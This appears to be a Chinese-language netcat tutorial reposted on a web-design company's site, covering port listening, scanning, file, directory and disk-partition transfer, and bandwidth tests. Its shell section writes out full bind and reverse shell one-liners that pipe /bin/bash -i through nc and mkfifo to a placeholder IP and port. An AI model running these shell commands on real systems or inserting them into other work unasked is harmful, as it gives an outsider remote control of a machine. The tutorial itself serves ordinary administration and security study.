這篇文章主要為大家詳細(xì)介紹了ncat使用的方法,文中示例代碼介紹的非常詳細(xì),圖文詳解容易學(xué)習(xí),非常適合初學(xué)者入門
成都創(chuàng)新互聯(lián)公司長期為上千多家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為無錫企業(yè)提供專業(yè)的網(wǎng)站制作、網(wǎng)站設(shè)計(jì),無錫網(wǎng)站改版等技術(shù)服務(wù)。擁有十年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。
1. 監(jiān)聽本地端口
2. 連接目標(biāo)端口
3. 傳送文件
4. Remote Administration with Netcat(OSCP中給的分類,不知道此分類的作用,需要深入學(xué)習(xí))
5. 反彈shell
6. 測兩臺(tái)機(jī)器間的網(wǎng)速
# 臨時(shí)監(jiān)聽端口
nc -l <PORT> # 臨時(shí)監(jiān)聽TCP端口一次
nc -lu <PORT> # 臨時(shí)監(jiān)聽UDP端口
# 以監(jiān)聽TCP端口為例,監(jiān)聽UDP端口基本一樣
服務(wù)器端臨時(shí)監(jiān)聽端口
客戶端嘗試連接服務(wù)器端
建立TCP連接
客戶端斷開連接時(shí),服務(wù)器端也關(guān)閉端口的監(jiān)聽
nc -lk <PORT> #永久監(jiān)聽TCP端口
nc -lku <PORT> #永久監(jiān)聽UDP端口
# 永久監(jiān)聽:監(jiān)聽端口,并且客戶端端來連接時(shí),服務(wù)器端依舊監(jiān)聽等待連接;并且支持多客戶端同時(shí)連接。UDP端口類似。
# 在監(jiān)聽部分可以找到連接的圖,接下來重點(diǎn)操作一下端口掃描;nc掃描端口會(huì)創(chuàng)建TCP三次握手連接,會(huì)造成一定的流量,容易被發(fā)現(xiàn)。
nc <IP> <PORT> # 連接目標(biāo)TCP端口
nc -u <IP> <PORT> # 連接目標(biāo)UDP端口
# 使用上述命令連接tcp或UDP端口,連接成功后會(huì)阻塞在用戶輸入中,讓用戶與目標(biāo)端口進(jìn)行交互。此外還有一種非交互模式,適合用來掃描端口。
nc -z <IP> <PORT> #掃描目標(biāo)TCP端口
nc -zu <IP> <PORT> # 掃描目標(biāo)UDP端口
# -w參數(shù)的適用場景:掃描UDP端口;網(wǎng)絡(luò)狀況不好。在網(wǎng)絡(luò)狀況良好是,掃描TCP端口沒有必要使用此參數(shù)。
nc -z -w1 <IP> <PORT> range
此部分需要兩臺(tái)機(jī)器的配合
A機(jī):數(shù)據(jù)存儲(chǔ)機(jī)器
B機(jī):備份機(jī)器
TCP傳送文件
B: nc -l <PORT> > filename
A: nc <IP> <PORT> < filename
文件傳送完成后,連接自動(dòng)斷開
UDP傳送文件
#B
nc -lu <PORT> > filename
#A
nc -u <IP> <PORT> < filename
# 文件傳輸完成后,連接不會(huì)斷開,可反復(fù)連接B機(jī)進(jìn)行文件傳輸。
# UDP更適合做一個(gè)日志接受端,其他的機(jī)器都把通過nc把日志寫入到監(jiān)聽的UDP機(jī)器上
傳送目錄
# 傳送目錄與傳送文件是一樣的,只是通過tar將目錄打包為壓縮文件傳過去并自定tar解包,實(shí)現(xiàn)傳送目錄的功能
#B
nc -l <PORT> | tar zxvf -
#A
tar zcf - * | nc <IP> <PORT>
傳送分區(qū)
B: nc -l <PORT> | dd of=/dev/sda
A: dd if=/dev/sda | nc <IP> <PORT>
# nc有-e選項(xiàng)時(shí)
#server
nc -l <PORT> -e /bin/bash -i
#client
nc <IP> <PORT>
# nc沒有-e選項(xiàng)時(shí),創(chuàng)建正向shell
#server
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc -l <PORT> > /tmp/fifo
#client
nc <IP> <PORT>
# 創(chuàng)建反向shell(服務(wù)器端連接客戶端,然后受客戶端控制)
#client:
nc <IP> <PORT>
#server:
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc <IP> <PORT> > /tmp/fifo && rm -rf /tmp/fifo
# server
nc -l <target port>
mkfifo /tmp/fifo && cat /tmp/fifo | nc localhost <target port> | nc -l <listen port> > /tmp/fifo
# client
nc -n <IP> <listen port>
A: nc -l <PORT> >/dev/null B: nc <IP> <PORT> < /dev/zero
A、B:watch -n 1 "/sbin/ifconfig <interface> | grep bytes"
本文在介紹關(guān)于ncat使用的基礎(chǔ)上,重點(diǎn)探討了其具體步驟,本文內(nèi)容緊湊,希望大家可以有所收獲。如果想了解更多,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!
本文名稱:ncat使用匯總
標(biāo)題鏈接:http://www.rwnh.cn/article0/jdggoo.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供品牌網(wǎng)站設(shè)計(jì)、ChatGPT、網(wǎng)站排名、域名注冊(cè)、App設(shè)計(jì)、外貿(mào)網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)